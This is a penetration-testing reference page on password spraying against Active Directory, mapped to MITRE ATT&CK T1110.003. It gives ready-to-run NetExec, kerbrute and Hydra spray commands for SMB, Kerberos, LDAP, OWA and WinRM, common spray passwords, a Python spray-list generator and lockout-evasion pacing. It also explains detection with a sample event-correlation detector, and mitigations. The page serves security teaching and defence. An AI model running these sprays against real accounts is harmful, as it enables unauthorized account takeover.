Password Spraying

Overview

Password spraying tests one or a few common passwords against many accounts, rather than many passwords against one account. Spread out this way, the attempts stay under the account lockout threshold: with a threshold of 5, spraying one password across 1000 users adds at most one failed logon to each account's counter. Password spraying is highly effective in enterprise environments because many users choose weak passwords that only just satisfy the minimum complexity rules (e.g., Season+Year!, Company2024!).

ATT&CK Mapping

  • Tactic: TA0006 - Credential Access
  • Technique: T1110.003 - Brute Force: Password Spraying

Prerequisites

  • List of valid usernames (from AD enumeration, email harvesting, LinkedIn)
  • Knowledge of the domain's password policy (lockout threshold, observation window)
  • Network access to authentication services (SMB, Kerberos, OWA, LDAP)

Techniques

Password Policy Enumeration

Before spraying, check the lockout threshold:

# NetExec — domain password policy
# https://github.com/Pennyw0rth/NetExec
nxc smb <DC_IP> -u <user> -p <password> --pass-pol

# enum4linux-ng
# https://github.com/cddmp/enum4linux-ng
enum4linux-ng -P -u <user> -p <password> <DC_IP>
:: From a domain-joined Windows machine
net accounts /domain

Key values:

  • Lockout threshold: failed attempts before the account locks (0, which net accounts prints as "Never", means no lockout and the spray can run without pacing)
  • Observation window ("reset account lockout counter after"): minutes that must pass since the account's last failed attempt before its failure counter resets to 0
  • Lockout duration: how long a locked account stays locked (0 means it stays locked until an administrator unlocks it)

SMB Spraying

# NetExec
# https://github.com/Pennyw0rth/NetExec
# Spray one password against all users
nxc smb <DC_IP> -u users.txt -p 'Summer2024!' -d <domain>

# Multiple passwords (one at a time with delay between rounds)
nxc smb <DC_IP> -u users.txt -p 'Summer2024!' -d <domain>
# Wait for observation window to reset, then:
nxc smb <DC_IP> -u users.txt -p 'Welcome1!' -d <domain>

# Continue testing after finding valid credentials
nxc smb <DC_IP> -u users.txt -p 'Summer2024!' -d <domain> --continue-on-success

# Spray with NTLM hash
nxc smb <DC_IP> -u users.txt -H '<NThash>' -d <domain>

Kerberos Spraying

Kerberos spraying is quieter than SMB/NTLM: a failed pre-authentication is recorded on the DC as Event ID 4771 rather than as 4625 on a target host or 4776 on the DC, so monitoring that keys on 4625 alone misses it. The lockout policy still applies, since the DC counts the failed pre-authentication against the account:

# kerbrute
# https://github.com/ropnop/kerbrute
kerbrute passwordspray -d <domain> --dc <DC_IP> users.txt 'Summer2024!'

LDAP Spraying

# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <DC_IP> -u users.txt -p 'Summer2024!' -d <domain>

OWA/Exchange Spraying

Outlook Web Access is internet-facing. It authenticates against the same domain accounts, so the lockout policy still applies, but perimeter logs are often watched less closely than DC logs and the attempts arrive from an external address that internal correlation rules may not cover:

# Hydra
# https://github.com/vanhauser-thc/thc-hydra
# Module string is "path:POST body:failure string". OWA is served over HTTPS, so use
# the https-post-form module, and the failure string must match what the target
# returns for a bad logon (confirm with one manual attempt through a proxy first),
# otherwise every guess is reported as a hit.
hydra -L users.txt -p 'Summer2024!' <target> https-post-form "/owa/auth.owa:destination=https%3A%2F%2F<target>%2Fowa&username=<domain>%5C^USER^&password=^PASS^:failed"

WinRM Spraying

# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc winrm <target> -u users.txt -p 'Summer2024!' -d <domain>

# (Pwn3d!) in the output means the credential is valid AND the user may log on
# through WinRM (local admin or a member of Remote Management Users); a plain [+]
# means the password is valid but WinRM access is denied

Common Spray Passwords

Effective spray passwords follow patterns that satisfy typical complexity requirements. The Windows default rule requires characters from at least three of the classes uppercase, lowercase, digit and special; most candidates below include all four so that they survive stricter policies too:

Season+Year:     Spring2024!, Summer2024!, Winter2024!
Company+Number:  Company123!, Company2024!
Welcome:         Welcome1!, Welcome123!
Password:        Password1!, P@ssw0rd!, P@ssword1
Month+Year:      January2024!, February2024!
City+Number:     London2024!, NewYork123!
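The pattern table above as a small generator, added here as an example (not code from the original page). It assumes a Windows-style complexity rule (minimum length plus three of four character classes, configurable) and takes the company name, year and month as inputs; "contoso" and July 2024 are constructed values. The ordering is the point: each observation window buys one password, so the likeliest guesses go first, and anything the policy would reject is dropped because no user can have set it.

```python
import string

SEASONS = ("Winter", "Spring", "Summer", "Autumn", "Fall")
MONTHS = ("January", "February", "March", "April", "May", "June", "July",
          "August", "September", "October", "November", "December")


def meets_complexity(pw: str, min_length: int = 8, classes_required: int = 3) -> bool:
    """Approximation of the Windows 'Password must meet complexity requirements'
    rule: at least min_length characters drawn from at least classes_required
    of the four classes upper, lower, digit, special. Stricter policies use 4."""
    classes = (
        any(c.isupper() for c in pw),
        any(c.islower() for c in pw),
        any(c.isdigit() for c in pw),
        any(c in string.punctuation for c in pw),
    )
    return len(pw) >= min_length and sum(classes) >= classes_required


def season_for(month: int) -> str:
    """Meteorological season of a calendar month (Dec-Feb is winter)."""
    if month in (12, 1, 2):
        return "Winter"
    if month in (3, 4, 5):
        return "Spring"
    if month in (6, 7, 8):
        return "Summer"
    return "Autumn"


def spray_candidates(company: str, year: int, month: int,
                     min_length: int = 8, classes_required: int = 3) -> list:
    """Ordered spray list for one engagement: likeliest guesses first, deduplicated,
    with anything the complexity rule would reject removed."""
    company = company[:1].upper() + company[1:]
    yy = str(year)[-2:]
    season = season_for(month)
    ordered = []
    # 1. Current season + year: the single most common enterprise pattern.
    ordered += [f"{season}{year}!", f"{season}{year}", f"{season}{yy}!"]
    # 2. Company name + year or number.
    ordered += [f"{company}{year}!", f"{company}123!", f"{company}{year}", f"{company}1!"]
    # 3. Helpdesk defaults that never got changed.
    ordered += ["Welcome1!", "Welcome123!", "Password1!", "P@ssw0rd!", "P@ssword1"]
    # 4. Current month + year.
    ordered += [f"{MONTHS[month - 1]}{year}!", f"{MONTHS[month - 1]}{yy}!"]
    # 5. The other seasons, for users whose password is a few months old.
    ordered += [f"{s}{year}!" for s in SEASONS if s != season]

    seen, result = set(), []
    for pw in ordered:
        if pw in seen or not meets_complexity(pw, min_length, classes_required):
            continue
        seen.add(pw)
        result.append(pw)
    return result
```

With the policy values from --pass-pol plugged into min_length and classes_required, the first entry is the password for round one and the rest are consumed one per observation window.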

Spraying Strategy

  1. Check the password policy: know the lockout threshold, the observation window and whether lockout is enabled at all
  2. Start with one password across all users
  3. Wait for the full observation window, measured from the last failed attempt on an account, before the next password (Windows default when lockout is enabled: 30 minutes)
  4. Spray the next password
  5. Never exceed (threshold - 1) attempts per account per observation window, and preferably fewer: the user's own mistyped logons count toward the same threshold
  6. Log every user, password and timestamp so that nothing is retested and every failed logon in the client's logs can be accounted for in the report

Detection Methods

Network-Based Detection

  • Many authentication attempts from a single source IP using different usernames
  • Authentication attempts against many accounts within a short time window
  • Off-hours authentication patterns

Host-Based Detection

  • Windows Event ID 4625 (failed logon; SubStatus 0xC000006A for a wrong password) on the targeted host, and 4776 (NTLM credential validation failed) on the DC, for many different accounts from one source
  • Windows Event ID 4771 (Kerberos pre-authentication failed, Failure Code 0x18) on the DC across many accounts; this is the trace each failed Kerberos guess leaves
  • Correlation: single source IP + many users + one or two failed attempts each, well below the lockout threshold, often outside business hours
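The correlation rule above run over sample events, as an added example (not a detection from the page or from any SIEM product). The events are constructed to look like a flattened export of 4625 and 4771 records (time, event ID, IpAddress, TargetUserName, and the 4625 SubStatus or 4771 Failure Code); only wrong-password codes are counted, so an unknown-account probe is left out, and a six-failure burst against one service account is deliberately not flagged because a single-account brute force is what the lockout threshold itself catches. The thresholds (30-minute window, ten distinct users, at most two failures each) are assumptions to tune per environment.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple


class Event(NamedTuple):
    time: datetime
    event_id: int      # 4625 (failed logon) or 4771 (Kerberos pre-auth failed)
    source: str        # IpAddress field
    target_user: str   # TargetUserName field
    code: str          # 4625 SubStatus or 4771 Status (Failure Code)


# Codes meaning "the password was wrong". Other codes, e.g. 4625 SubStatus
# 0xC0000064 (no such user), are username enumeration and are not counted here.
BAD_PASSWORD = {4625: "0xC000006A", 4771: "0x18"}


def constructed_events() -> list:
    """Synthetic events standing in for a SIEM export; not real logs."""
    base = datetime(2024, 7, 1, 2, 0, 0)          # 02:00, outside business hours
    events = []
    spray_users = ["alice", "bob", "carol", "dave", "erin", "frank",
                   "grace", "heidi", "ivan", "judy", "mallory", "oscar"]
    # One source, one wrong password against 12 accounts in two minutes,
    # half over NTLM (4625) and half over Kerberos (4771).
    for i, user in enumerate(spray_users):
        eid, code = (4771, "0x18") if i % 2 else (4625, "0xC000006A")
        events.append(Event(base + timedelta(seconds=10 * i), eid, "10.10.5.23", user, code))
    # The same source probing a non-existent account: not a password failure.
    events.append(Event(base + timedelta(seconds=5), 4625, "10.10.5.23", "nosuchuser", "0xC0000064"))
    # Another host hammering a single service account: brute force, not a spray.
    for i in range(6):
        events.append(Event(base + timedelta(minutes=5, seconds=i), 4625, "10.10.7.9", "svc_backup", "0xC000006A"))
    # A user mistyping their own password once during the day.
    events.append(Event(base + timedelta(hours=7), 4625, "10.10.9.44", "dave", "0xC000006A"))
    return events


def detect_spray(events, window_minutes=30, min_users=10, max_per_user=2) -> list:
    """Sliding window per source: alert when one source produces wrong-password
    failures against at least min_users distinct accounts with no account failing
    more than max_per_user times. The low per-account count is what separates a
    spray from a single-account brute force. One alert per source, reporting the
    window with the most distinct accounts."""
    by_source = defaultdict(list)
    for e in sorted(events, key=lambda e: e.time):
        if BAD_PASSWORD.get(e.event_id) == e.code:
            by_source[e.source].append(e)
    window = timedelta(minutes=window_minutes)
    alerts = []
    for source, evs in by_source.items():
        best, start = None, 0
        for end, e in enumerate(evs):
            while evs[start].time < e.time - window:
                start += 1                        # drop events older than the window
            in_window = evs[start:end + 1]
            per_user = Counter(x.target_user for x in in_window)
            if len(per_user) < min_users or max(per_user.values()) > max_per_user:
                continue
            if best is None or len(per_user) > best["distinct_users"]:
                best = {
                    "source": source,
                    "distinct_users": len(per_user),
                    "max_per_user": max(per_user.values()),
                    "event_ids": sorted({x.event_id for x in in_window}),
                    "first": in_window[0].time.isoformat(),
                    "last": e.time.isoformat(),
                }
        if best:
            alerts.append(best)
    return alerts
```

The same grouping works on 4776 with the Workstation field in place of IpAddress, which matters because an NTLM spray relayed through a member server shows up there rather than in 4625 on the DC.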

Mitigation Strategies

  • Smart lockout: Microsoft Entra ID (formerly Azure AD) smart lockout tracks failures per location, so a sprayer at an unfamiliar location is locked out while the real user signing in from a familiar one is not
  • Multi-factor authentication: a sprayed password alone does not grant access, but it still confirms a valid credential that can be replayed against anything that accepts password-only authentication (legacy protocols, VPN portals without MFA), so those paths need closing too
  • Banned-password lists: reject the common spray patterns (Season+Year, Company+Number, Welcome1) at password-set time
  • Monitoring and alerting: alert on distributed failed-logon patterns (many users, one or two failures each, one source)
  • Conditional Access: block authentication from unexpected locations or devices

References

  • MITRE ATT&CK, T1110.003 Brute Force: Password Spraying